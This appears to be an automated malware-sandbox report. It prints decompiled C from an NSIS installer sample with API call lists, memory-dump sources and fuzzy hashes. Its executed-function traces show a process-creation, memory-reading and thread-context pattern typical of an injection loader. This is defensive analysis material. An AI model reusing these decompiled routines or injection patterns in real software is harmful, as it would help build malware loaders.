              				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
              				if((_t55 & 0x00010000) == 0) {
              					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
              				} else {
              					_t38 = E00402D3E(0x11);
              				}
              				 *(_t65 - 0x44) = _t38;
              				GetClientRect( *(_t65 + 8), _t65 - 0x60);
              				asm("sbb esi, esi");
              				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
              				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
              				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
              					DeleteObject(_t48);
              				}
              				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
              					_push(_t63);
              					E00406483();
              				}
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t65 - 4));
              				return 0;
              			}

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
              • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E00401E4E(intOrPtr __edx) {
              				void* __edi;
              				int _t9;
              				signed char _t15;
              				struct HFONT__* _t18;
              				intOrPtr _t30;
              				void* _t31;
              				struct HDC__* _t33;
              				void* _t35;
              
              				_t30 = __edx;
              				_t33 = GetDC( *(_t35 - 8));
              				_t9 = E00402D1C(2);
              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
              				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
              				ReleaseDC( *(_t35 - 8), _t33);
              				 *0x40ce08 = E00402D1C(3);
              				_t15 =  *((intOrPtr*)(_t35 - 0x20));
              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
              				 *0x40ce0f = 1;
              				 *0x40ce0c = _t15 & 0x00000001;
              				 *0x40ce0d = _t15 & 0x00000002;
              				 *0x40ce0e = _t15 & 0x00000004;
              				E00406579(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
              				_t18 = CreateFontIndirectW(0x40cdf8);
              				_push(_t18);
              				_push(_t31);
              				E00406483();
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t35 - 4));
              				return 0;
              			}

              APIs
              • GetDC.USER32(?), ref: 00401E51
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
              • ReleaseDC.USER32 ref: 00401E84
              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CapsCreateDeviceFontIndirectRelease
              • String ID:
              • API String ID: 3808545654-0
              • Opcode ID: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
              • Opcode Fuzzy Hash: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E00401C43(intOrPtr __edx) {
              				int _t29;
              				long _t30;
              				signed int _t32;
              				WCHAR* _t35;
              				long _t36;
              				int _t41;
              				signed int _t42;
              				int _t46;
              				int _t56;
              				intOrPtr _t57;
              				struct HWND__* _t63;
              				void* _t64;
              
              				_t57 = __edx;
              				_t29 = E00402D1C(3);
              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              				 *(_t64 - 0x18) = _t29;
              				_t30 = E00402D1C(4);
              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              				 *(_t64 + 8) = _t30;
              				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
              					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
              				}
              				__eflags =  *(_t64 - 0x1c) & 0x00000002;
              				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
              					 *(_t64 + 8) = E00402D3E(0x44);
              				}
              				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
              				_push(1);
              				if(__eflags != 0) {
              					_t61 = E00402D3E();
              					_t32 = E00402D3E();
              					asm("sbb ecx, ecx");
              					asm("sbb eax, eax");
              					_t35 =  ~( *_t31) & _t61;
              					__eflags = _t35;
              					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
              					goto L10;
              				} else {
              					_t63 = E00402D1C();
              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              					_t41 = E00402D1C(2);
              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              					_t56 =  *(_t64 - 0x1c) >> 2;
              					if(__eflags == 0) {
              						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
              						L10:
              						 *(_t64 - 0x38) = _t36;
              					} else {
              						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
              						asm("sbb eax, eax");
              						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
              					}
              				}
              				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
              				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
              					_push( *(_t64 - 0x38));
              					E00406483();
              				}
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t64 - 4));
              				return 0;
              			}

              APIs
              • SendMessageTimeoutW.USER32 ref: 00401CB3
              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
              • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E00405E11(WCHAR* _a4) {
              				WCHAR* _t9;
              
              				_t9 = _a4;
              				_push( &(_t9[lstrlenW(_t9)]));
              				_push(_t9);
              				if( *(CharPrevW()) != 0x5c) {
              					lstrcatW(_t9, 0x40a014);
              				}
              				return _t9;
              			}

              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-3081826266
              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00403B19() {
              				void* _t1;
              				void* _t2;
              				signed int _t11;
              
              				_t1 =  *0x40a018; // 0x2bc
              				if(_t1 != 0xffffffff) {
              					CloseHandle(_t1);
              					 *0x40a018 =  *0x40a018 | 0xffffffff;
              				}
              				_t2 =  *0x40a01c; // 0x2b8
              				if(_t2 != 0xffffffff) {
              					CloseHandle(_t2);
              					 *0x40a01c =  *0x40a01c | 0xffffffff;
              					_t11 =  *0x40a01c;
              				}
              				E00403B76();
              				return E00405C4E(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nshD279.tmp", 7);
              			}

              APIs
              • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
              • CloseHandle.KERNEL32(000002B8,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
              • C:\Users\user\AppData\Local\Temp\nshD279.tmp, xrefs: 00403B4F
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nshD279.tmp
              • API String ID: 2962429428-2705349947
              • Opcode ID: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
              • Opcode Fuzzy Hash: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 53%
              			E00405F19(void* __eflags, intOrPtr _a4) {
              				int _t11;
              				signed char* _t12;
              				intOrPtr _t18;
              				intOrPtr* _t21;
              				signed int _t23;
              
              				E0040653C(0x425f50, _a4);
              				_t21 = E00405EBC(0x425f50);
              				if(_t21 != 0) {
              					E004067EB(_t21);
              					if(( *0x42a27c & 0x00000080) == 0) {
              						L5:
              						_t23 = _t21 - 0x425f50 >> 1;
              						while(1) {
              							_t11 = lstrlenW(0x425f50);
              							_push(0x425f50);
              							if(_t11 <= _t23) {
              								break;
              							}
              							_t12 = E0040689A();
              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
              								E00405E5D(0x425f50);
              								continue;
              							} else {
              								goto L1;
              							}
              						}
              						E00405E11();
              						return 0 | GetFileAttributesW(??) != 0xffffffff;
              					}
              					_t18 =  *_t21;
              					if(_t18 == 0 || _t18 == 0x5c) {
              						goto L1;
              					} else {
              						goto L5;
              					}
              				}
              				L1:
              				return 0;
              			}









              APIs
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405F72
              • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 00405F82
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID: P_B
              • API String ID: 3248276644-906794629
              • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
              • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 89%
              			E00405518(struct HWND__* _a4, int _a8, int _a12, long _a16) {
              				int _t15;
              				long _t16;
              
              				_t15 = _a8;
              				if(_t15 != 0x102) {
              					if(_t15 != 0x200) {
              						_t16 = _a16;
              						L7:
              						if(_t15 == 0x419 &&  *0x423734 != _t16) {
              							_push(_t16);
              							_push(6);
              							 *0x423734 = _t16;
              							E00404ECD();
              						}
              						L11:
              						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
              					}
              					if(IsWindowVisible(_a4) == 0) {
              						L10:
              						_t16 = _a16;
              						goto L11;
              					}
              					_t16 = E00404E4D(_a4, 1);
              					_t15 = 0x419;
              					goto L7;
              				}
              				if(_a12 != 0x20) {
              					goto L10;
              				}
              				E004044DE(0x413);
              				return 0;
              			}






              APIs
              • IsWindowVisible.USER32(?), ref: 00405547
              • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
              • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E0040640A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
              				int _v8;
              				long _t21;
              				long _t24;
              				char* _t30;
              
              				asm("sbb eax, eax");
              				_v8 = 0x800;
              				_t21 = E004063A9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
              				_t30 = _a16;
              				if(_t21 != 0) {
              					L4:
              					 *_t30 =  *_t30 & 0x00000000;
              				} else {
              					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
              					_t21 = RegCloseKey(_a20);
              					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
              					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
              						goto L4;
              					}
              				}
              				return _t21;
              			}








              APIs
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,KXCJDFJSKF,?,?,00406699,80000002), ref: 00406450
              • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,KXCJDFJSKF,KXCJDFJSKF,KXCJDFJSKF,00000000,00422728), ref: 0040645B
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseQueryValue
              • String ID: KXCJDFJSKF
              • API String ID: 3356406503-1579689790
              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405B25(WCHAR* _a4) {
              				struct _PROCESS_INFORMATION _v20;
              				int _t7;
              
              				0x426750->cb = 0x44;
              				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20);
              				if(_t7 != 0) {
              					CloseHandle(_v20.hThread);
              					return _v20.hProcess;
              				}
              				return _t7;
              			}






              APIs
              Strings
              • Error launching installer, xrefs: 00405B38
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405F97(void* __ecx, CHAR* _a4, CHAR* _a8) {
              				int _v8;
              				int _t12;
              				int _t14;
              				int _t15;
              				CHAR* _t17;
              				CHAR* _t27;
              
              				_t12 = lstrlenA(_a8);
              				_t27 = _a4;
              				_v8 = _t12;
              				while(lstrlenA(_t27) >= _v8) {
              					_t14 = _v8;
              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
              					_t15 = lstrcmpiA(_t27, _a8);
              					_t27[_v8] =  *(_t14 + _t27);
              					if(_t15 == 0) {
              						_t17 = _t27;
              					} else {
              						_t27 = CharNextA(_t27);
              						continue;
              					}
              					L5:
              					return _t17;
              				}
              				_t17 = 0;
              				goto L5;
              			}










              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBF
              • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
              • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              APIs
                • Part of subcall function 0305126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 0305128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 030518E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03051960
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: c18e78c065479a359cf65b108b520bb83b972a7254590eb8aeb425a88841cbae
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: 60026E25E54398E9EF61CBE4EC05BEDB7B5AF44B10F10448AEA08FE1D1D3B50A84DB16
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 03050A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 03050C1F
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: ca06f2455a13a6e2623d24839d020b9b5991afe30f343d863547a9773fe318cb
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: A2A1F334D02209EFEF50DFE4C985BEEBBB5BF08319F208895E911BA2A0D3755A51DB14
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 03051BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 03051BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 03051B25
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction ID: ecd8eb4e03e99d5960782783564637d192464969bf2cb627a26ebae6722a1145
              • Opcode Fuzzy Hash: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction Fuzzy Hash: 7041DF74D42209FEEF15EBA0CD05BEEBAB9EF14312F1048A5FA11B91A0E7754A51EB10
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 030505BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 030505E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03050605
              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0305091F
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadTerminateThread
              • String ID:
              • API String ID: 3842210937-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: c5cb32b3d47d66ea58c715c488cb419230e5f5946d324a49cbe6186d6a536f8f
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 30521E35E51358EEEB60CBA4EC55BFEB7B5AF44710F20549AEA08EA1A0D3705E80DF05
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 03051BFF
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction ID: 78741cac309ef26915e06c777a6c56697654d140138def528c9dd8ef58df2b6b
              • Opcode Fuzzy Hash: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction Fuzzy Hash: 60F01C75C0120CFFDF04EFA8C8096AEBFB4EF00311F144AA5E82067291D7314AA1DB44
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 0305128F
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 4c72bef9330216431e4fe62387a46aa0ae890da15b6432787964ff0caa7ad40b
